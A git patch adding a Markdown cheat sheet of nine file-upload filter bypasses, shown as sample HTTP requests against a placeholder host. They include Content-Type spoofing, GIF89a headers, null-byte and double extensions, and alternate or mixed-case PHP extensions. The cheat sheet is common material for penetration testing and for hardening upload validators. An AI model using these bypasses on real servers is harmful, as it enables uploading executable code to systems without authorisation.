From 50b4a02d539d539da9633a681786aeef37ac99e8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 26 Sep 2020 06:31:06 +0700 Subject: [PATCH] Bypass File Upload [1] Add bypass file upload tips and add 9 tips --- BypassFileUpload.md | 83 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 BypassFileUpload.md diff --git a/BypassFileUpload.md b/BypassFileUpload.md new file mode 100644 index 0000000..57f6bd3 --- /dev/null +++ b/BypassFileUpload.md @@ -0,0 +1,83 @@ +# Bypass File Upload +1. Change the ContentType +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` +Change the Content-Type +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/jpeg +``` + +2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" +Content-Type: application/x-php +``` +Change the request to this +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: application/x-php +``` + +3. Upload the payload, but start with GIF89a; and +``` +POST /images/upload/ HTTP/1.1 +Host: target.com +[...] + +---------------------------829348923824 +Content-Disposition: form-data; name="uploaded"; filename="dapos.php" +Content-Type: image/gif + +GIF89a; +``` +And dont forget to change the content-type to image/gif + +4. Bypass content length validation, it can be bypassed using small payload +``` +() +``` + +5. Using null byte in filename +``` +file.php%00.gif +``` + +6. Using double extensions for the uploaded file +``` +file.jpg.php +``` + +7. Uploading an unpopular php extensions (php4,php5,php6,phtml) +``` +file.php5 +``` + +8. Try to randomly capitalizes the file extension +``` +file.pHP5 +``` + +9. Mix the tips!